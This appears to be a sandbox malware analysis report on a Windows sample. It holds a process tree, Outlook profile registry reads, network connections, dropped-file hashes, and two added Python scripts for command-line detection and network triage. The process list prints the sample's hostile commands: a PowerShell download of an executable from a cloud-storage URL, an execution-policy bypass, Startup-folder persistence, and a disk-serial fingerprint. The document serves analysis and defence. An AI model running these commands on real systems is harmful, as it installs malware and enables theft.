PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 872 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 872 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4476 wrote to memory of 2928 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 wrote to memory of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\.ses",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 412

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
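
The process chain above is the part of this report that maps most directly onto detection logic: a PowerShell Invoke-WebRequest that writes a PE into C:\Users\Public, a script run with -ExecutionPolicy Bypass, the dropped AutoIt interpreter Guard.exe executing Secure.au3, a Startup-folder .url shortcut assembled with cmd echo, a disk serial number read through wmic, and rundll32 loading a file called .ses from Temp. The script below is an added example, not part of the sandbox report or of the sample, that runs a handful of command-line rules over those command lines (copied here as sample input) and reports which rule fired on which line. The rule names, the regular expressions and the rundll32 path heuristic are the editor's own choices. The many "shell32.dll",#61 rundll32 launches are the benign baseline in this report, so the rundll32 rule keys on where the loaded module lives and whether it is a .dll rather than on rundll32 itself; rundll32 will happily load a PE regardless of its extension, so the extension alone is a weak signal and the path check is the one that matters.

```python
import re

# Command lines copied from the Processes list of this report, used as sample
# input (constructed from the report; Explorer and WerFault entries omitted).
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"',
    r'powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""',
    r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"',
    r'"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3',
    r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit',
    r'"C:\Users\Public\jsc.exe"',
    r'cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value',
    r'"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\.ses",start',
    r'"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61',
]

# Each rule is (name, regex) searched case-insensitively against the whole command line.
# Names and patterns are the editor's own, not signatures from the sandbox.
RULES = [
    ("powershell_download_to_users_public",
     re.compile(r'powershell.*Invoke-WebRequest.*-OutFile\s+"?C:\\Users\\Public\\', re.I)),
    ("powershell_executionpolicy_bypass_file",
     re.compile(r'powershell.*-ExecutionPolicy\s+Bypass\b.*-File\b', re.I)),
    ("startup_folder_url_shortcut_via_echo",
     re.compile(r'echo\s+\[InternetShortcut\].*\\Start Menu\\Programs\\Startup\\[^"]+\.url', re.I)),
    ("wmic_diskdrive_serial_fingerprint",
     re.compile(r'\bwmic\s+diskdrive\b.*\bSerialNumber\b', re.I)),
    ("execution_from_users_public",
     re.compile(r'^"?C:\\Users\\Public\\[^"\s]+\.(?:exe|ps1|js|vbs|au3)\b', re.I)),
]

# rundll32 gets a structural check instead of a keyword: extract the module it was
# told to load, then look at its extension and at whether it sits in a user-writable path.
RUNDLL32_RE = re.compile(
    r'^"?(?:[A-Za-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<mod>[^",]+)', re.I)
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


def rundll32_suspicious_module(cmdline):
    """True when rundll32 loads a module that is not a .dll or lives in a user-writable directory."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return False
    module = m.group("mod").strip().lower()
    return not module.endswith(".dll") or any(p in module for p in USER_WRITABLE)


def scan(cmdlines):
    """Return {rule_name: [command lines that matched]} for the given command lines."""
    hits = {}
    for cl in cmdlines:
        for name, rx in RULES:
            if rx.search(cl):
                hits.setdefault(name, []).append(cl)
        if rundll32_suspicious_module(cl):
            hits.setdefault("rundll32_suspicious_module", []).append(cl)
    return hits


if __name__ == "__main__":
    for name, lines in scan(SAMPLE_CMDLINES).items():
        print(f"[{name}]")
        for cl in lines:
            print("   ", cl[:110])
```

Run as-is, the script flags six of the nine sample lines and leaves the original dropper and the shell32.dll,#61 launches alone. The rules are deliberately narrow (an Invoke-WebRequest into a system path, or a rundll32 call with a .dll under System32, does not fire) so that they can be fed a full process log without drowning in noise.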

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20210 tcp
N/A 127.0.0.1:20210 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
FR 46.105.141.51:443 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
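
The Network table above mixes several kinds of rows that deserve different treatment when triaging: the resolver's reverse (in-addr.arpa) lookups, forward DNS queries, outbound TCP connections (the rows with no Domain column were not tied to a resolved name in the report), loopback connections on ephemeral ports, and mDNS multicast. The script below is an added example, not part of the report, that parses rows in this table's layout, separates those categories, and flags a query name that cannot be a registered host, such as the nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs entry, whose two labels are identical and whose rightmost label is no real TLD. The sample rows are copied from the table; the "unregistrable name" heuristic is the editor's own and says nothing about what the sample does with that query.

```python
import ipaddress
import re
from collections import Counter

# Rows copied from the Network table of this report (constructed sample input).
# Rows with no Domain column are the raw TCP connections exactly as the report lists them.
SAMPLE_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
FR 46.105.141.51:443 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20196 tcp
N/A 127.0.0.1:20210 tcp
"""

# Country, ip:port, optional domain, proto; the domain column is simply absent on some rows.
ROW_RE = re.compile(r"^(\S+)\s+(\S+?):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")


def parse_rows(text):
    """Parse table rows in the report's layout into dicts; lines that do not fit are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_target(domain):
    """For a reverse-lookup name return the IPv4 address it asks about, else None."""
    suffix = ".in-addr.arpa"
    if not domain or not domain.lower().endswith(suffix):
        return None
    return ".".join(reversed(domain[:-len(suffix)].split(".")))


def looks_unregistrable(domain):
    """Editor's heuristic: two identical labels, or a rightmost label longer than any real TLD."""
    labels = domain.split(".")
    return (len(labels) == 2 and labels[0] == labels[1]) or len(labels[-1]) > 24


def triage(rows):
    """Bucket rows into external connections, DNS queries, PTR lookups, odd names, loopback, multicast."""
    out = {"external": Counter(), "dns_queries": [], "ptr_lookups": [],
           "odd_dns": [], "loopback": Counter(), "multicast": Counter()}
    for r in rows:
        ip = ipaddress.ip_address(r["ip"])
        endpoint = f'{r["ip"]}:{r["port"]}/{r["proto"]}'
        if ip.is_loopback:
            out["loopback"][endpoint] += 1
        elif ip.is_multicast:
            out["multicast"][endpoint] += 1
        elif r["port"] == 53 and r["proto"] == "udp" and r["domain"]:
            target = ptr_target(r["domain"])
            if target:
                out["ptr_lookups"].append(target)
            elif looks_unregistrable(r["domain"]):
                out["odd_dns"].append(r["domain"])
            else:
                out["dns_queries"].append(r["domain"])
        else:
            out["external"][(endpoint, r["domain"], r["country"])] += 1
    return out


if __name__ == "__main__":
    for key, value in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

On the sample rows this leaves two external endpoints worth a closer look (the my.cloudme.com host that served Guard.exe, and the FR address on 443 that the report never ties to a name), one forward query, two PTR lookups that are resolver noise, one unregistrable query name, and the loopback and mDNS traffic that can be set aside. The PTR targets are returned as plain addresses so that they can be compared against the external endpoints when the table is much longer than this one.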

Files

memory/1632-0-0x00007FFBFAB63000-0x00007FFBFAB65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyzhh5qo.0zf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1632-10-0x000001BCDF980000-0x000001BCDF9A2000-memory.dmp

memory/1632-11-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

memory/1632-12-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

memory/1632-16-0x00007FFBFAB60000-0x00007FFBFB621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3668-19-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-25-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-30-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c20ac38ae3022e305b8752804aadf486
SHA1 4c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA256 03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512 c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

memory/3668-33-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-34-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

memory/3668-35-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

memory/3668-40-0x00007FFBFAA10000-0x00007FFBFB4D1000-memory.dmp

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

memory/3232-51-0x0000000000930000-0x0000000000DF2000-memory.dmp

memory/3232-54-0x00000000066A0000-0x0000000006B2E000-memory.dmp

memory/3232-55-0x0000000007D80000-0x0000000008210000-memory.dmp

memory/3232-56-0x00000000087C0000-0x0000000008D64000-memory.dmp

memory/3232-57-0x00000000082D0000-0x0000000008362000-memory.dmp

memory/3232-79-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-81-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-105-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-119-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-117-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-115-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-113-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-111-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-109-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-107-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-103-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-101-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-99-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-97-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-95-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-93-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-91-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-89-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-85-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-83-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-77-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-75-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-71-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-67-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-65-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-63-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-59-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-87-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-73-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-69-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-61-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-58-0x0000000007D80000-0x000000000820A000-memory.dmp

memory/3232-1132-0x0000000005A00000-0x0000000005E02000-memory.dmp

memory/3232-1133-0x00000000056B0000-0x00000000056FC000-memory.dmp

memory/3232-1137-0x0000000005710000-0x0000000005764000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.ses

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Hstystr

MD5 2d20777d77d0faaca86d065cf2e94334
SHA1 1fb40a1251638132a9a839ba1dc3c97176f770c6
SHA256 d6697a56c0675418791a7cf1cb7ed8dcd6dd25aa0f23756c966b4f1d044ae994
SHA512 6745880a1994c9ab4d72acfd4814ca497db061e682a450983828b7a155c2f9d3e919859cbc563f5aa173fddcb083e50bfab5155eb1a6af15bf5e7cba9af86ddb

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Riqafttyqfs

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574